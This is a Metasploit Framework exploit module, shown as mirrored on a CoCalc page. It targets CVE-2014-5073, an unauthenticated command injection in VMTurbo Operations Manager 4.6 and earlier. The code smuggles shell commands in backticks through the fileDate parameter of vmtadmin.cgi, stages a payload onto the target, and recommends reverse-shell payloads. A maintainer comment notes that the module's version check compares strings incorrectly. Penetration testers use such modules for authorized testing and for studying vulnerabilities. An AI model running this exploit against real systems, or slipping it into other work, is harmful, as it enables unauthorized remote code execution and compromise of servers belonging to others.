CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10
  include Msf::Exploit::CmdStager

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(update_info(info,

15
      'Name'        => 'VMTurbo Operations Manager vmtadmin.cgi Remote Command Execution',

16
      'Description' => %q{

17
          VMTurbo Operations Manager 4.6 and prior are vulnerable to unauthenticated

18
          OS Command injection in the web interface. Use reverse payloads for the most

19
          reliable results. Since it is a blind OS command injection vulnerability,

20
          there is no output for the executed command when using the cmd generic payload.

21
          Port binding payloads are disregarded due to the restrictive firewall settings.

22


23
          This module has been tested successfully on VMTurbo Operations Manager versions 4.5 and

24
          4.6.

25
      },

26
      'Author'      =>

27
        [

28
          # Secunia Research - Discovery and Metasploit module

29
          'Emilio Pinna <emilio.pinn[at]gmail.com>'

30
        ],

31
      'License'     => MSF_LICENSE,

32
      'References'  =>

33
        [

34
            ['CVE', '2014-5073'],

35
            ['OSVDB', '109572'],

36
            ['URL', 'http://web.archive.org/web/20140905004331/http://secunia.com:80/secunia_research/2014-8/']

37
        ],

38
      'DisclosureDate' => '2014-06-25',

39
      'Privileged'     => false,

40
      'Platform'       => %w{ linux unix },

41
      'Payload'        =>

42
        {

43
          'Compat'   =>

44
          {

45
            'ConnectionType' => '-bind'

46
          }

47
        },

48
      'Targets'        =>

49
      [

50
        [ 'Unix CMD',

51
          {

52
            'Arch' => ARCH_CMD,

53
            'Platform' => 'unix'

54
          }

55
        ],

56
        [ 'VMTurbo Operations Manager',

57
          {

58
          'Arch' => [ ARCH_X86, ARCH_X64 ],

59
          'Platform' => 'linux'

60
          }

61
        ],

62
      ],

63
      'DefaultTarget'  => 1

64
      ))

65


66
    deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')

67
  end

68


69
  def check

70
  begin

71
    res = send_request_cgi({

72
      'method' => 'GET',

73
      'uri'    => "/cgi-bin/vmtadmin.cgi",

74
      'vars_get' => {

75
        "callType" => "ACTION",

76
        "actionType" => "VERSIONS"

77
      }

78
    })

79
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

80
      vprint_error("Failed to connect to the web server")

81
      return Exploit::CheckCode::Unknown

82
  end

83


84
  if res and res.code == 200 and res.body =~ /vmtbuild:([\d]+),vmtrelease:([\d.]+),vmtbits:[\d]+,osbits:[\d]+/

85
    version = $2

86
    build = $1

87


88
    vprint_status("VMTurbo Operations Manager version #{version} build #{build} detected")

89
    else

90
      vprint_status("Unexpected vmtadmin.cgi response")

91
      return Exploit::CheckCode::Unknown

92
    end

93


94
    # NOTE (@todb): This PHP style comparison seems incorrect, since

95
    # strings are being compared and not numbers. Example:

96
    # 1.9.3p547 :001 > a = "4.6"

97
    #  => "4.6"

98
    # 1.9.3p547 :002 > b = "10.6"

99
    #  => "10.6"

100
    # 1.9.3p547 :003 > a <= b

101
    #

102
    # Also, the description says 4.5 is also vuln. This doesn't

103
    # appear to care.

104
    if version and version <= "4.6" and build < "28657"

105
      return Exploit::CheckCode::Appears

106
    else

107
      return Exploit::CheckCode::Safe

108
    end

109
  end

110


111
  def execute_command(cmd, opts)

112
    begin

113
    res = send_request_cgi({

114
      'uri'    => '/cgi-bin/vmtadmin.cgi',

115
      'method' => 'GET',

116
      'vars_get' => {

117
        "callType" => "DOWN",

118
        "actionType" => "CFGBACKUP",

119
        "fileDate" => "\"`#{cmd}`\""

120
      }

121
    })

122
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

123
      vprint_error("Failed to connect to the web server")

124
      return nil

125
    end

126


127
    vprint_status("Sent command #{cmd}")

128
  end

129


130
  def exploit

131


132
    # Handle single command shot

133
    if target.name =~ /CMD/

134
      cmd = payload.encoded

135
      res = execute_command(cmd, {})

136


137
      unless res

138
        fail_with(Failure::Unknown, "#{peer} - Unable to execute payload")

139
      end

140


141
      print_status("Blind Exploitation - unknown exploitation state")

142
      return

143
    end

144


145
    # Handle payload upload using CmdStager mixin

146
    execute_cmdstager({:flavor => :printf})

147
  end

148
end

149


150